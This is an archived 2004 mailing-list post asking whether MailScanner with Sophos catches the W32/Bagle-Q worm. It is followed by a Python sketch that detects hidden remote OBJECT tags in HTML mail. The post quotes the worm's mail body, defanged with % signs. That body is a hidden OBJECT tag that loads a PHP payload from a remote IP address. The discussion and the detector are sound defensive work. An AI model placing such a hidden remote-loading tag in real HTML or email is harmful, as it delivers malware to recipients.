Will MailScanner pickup the W32/Bagle-Q virus?

John Rudd jrudd at UCSC.EDU
Thu Mar 18 23:25:01 GMT 2004


I'm not sure that the Sophos IDE will catch the _email_ message.  If the
virus file was on your hard drive, then it might catch that, but that's
not what MailScanner is dealing with.  MailScanner is dealing with this:

%html>%body>
%font  face="System">
%OBJECT STYLE="display:none" DATA="http://169.233.42.189:81/915914.php">
%/OBJECT>%/body>%/html>


( replace the %'s with <'s )

There's nothing in that message body for Sophos to trip over.


We've had the Sophos IDE on our system since last night at 11:30pm
(about 7:30 GMT on the 18th), but our logs don't show any instances of
Bagle-Q being identified ... even though we have some indications that
it is actually hitting some of our users.


Ryan Bingham wrote:
>
> Just a quick question on this:  if you're running MailScanner with
> Sophos and have the latest Sophos IDEs, would there be any reason to
> upgrade to the beta version?
>
> Thanks,
>
> Ryan
>
> On Thu, 2004-03-18 at 18:04, Peter Bonivart wrote:
> > Jason Williams wrote:
> > > For these rules, where would one put them in? spam.assassin.prefs.conf ?
> >
> > That's OK if it's just a couple of rules but if you want to start a
> > little collection of special rules it might be better to put it in a .cf
> > file in /etc/mail/spamassassin. The upgrades (of MS) will be easier.
> >
> > --
> > /Peter Bonivart
> >
> > --Unix lovers do it in the Sun
> >
> > Sun Fire V210, Solaris 9, Sendmail 8.12.10, MailScanner 4.25-14,
> > SpamAssassin 2.63 + DCC 1.2.30, ClamAV 0.67 + GMP 4.1.2, MailStats 0.25
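
The message above points out that the mail carries no file to match, only an HTML body with a hidden OBJECT tag whose DATA attribute names a remote URL. The Python sketch below checks for that structure; it is an added example, not part of the original post or of MailScanner, and the function names and sample messages (using the documentation address 192.0.2.10) are constructed for illustration.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

REMOTE_SCHEMES = {"http", "https", "ftp"}

class ObjectTagFinder(HTMLParser):
    """Collect <object> tags whose DATA attribute points at a remote URL."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "object":  # HTMLParser lowercases tag and attribute names
            return
        attr = {name: (value or "") for name, value in attrs}
        try:
            url = urlparse(attr.get("data", "").strip())
        except ValueError:  # malformed URL, nothing to report
            return
        if url.scheme in REMOTE_SCHEMES:
            style = attr.get("style", "").replace(" ", "").lower()
            self.hits.append({"url": url.geturl(), "hidden": "display:none" in style})

def remote_objects(raw_message: bytes):
    """Return remote <object data=...> references from every text/html part."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    finder = ObjectTagFinder()
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        try:
            html = part.get_content()
        except LookupError:  # unknown charset label in the Content-Type header
            html = part.get_payload(decode=True).decode("latin-1")
        finder.feed(html)
    finder.close()
    return finder.hits

# Constructed sample shaped like the body quoted in the message above.
SAMPLE = (b"From: sender@example.com\r\nSubject: constructed sample\r\n"
          b"MIME-Version: 1.0\r\nContent-Type: text/html; charset=us-ascii\r\n\r\n"
          b'<html><body>\r\n<font face="System">\r\n'
          b'<OBJECT STYLE="display:none" DATA="http://192.0.2.10:81/sample.php">\r\n'
          b"</OBJECT></body></html>\r\n")
# Constructed benign mail: an ordinary link and an inline (cid:) object are not flagged.
BENIGN = (b"Content-Type: text/html\r\n\r\n"
          b'<html><body><a href="http://example.com/">link</a>'
          b'<object data="cid:part1"></object></body></html>\r\n')

if __name__ == "__main__":
    for name, raw in (("sample", SAMPLE), ("benign", BENIGN)):
        print(name, remote_objects(raw))
```
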


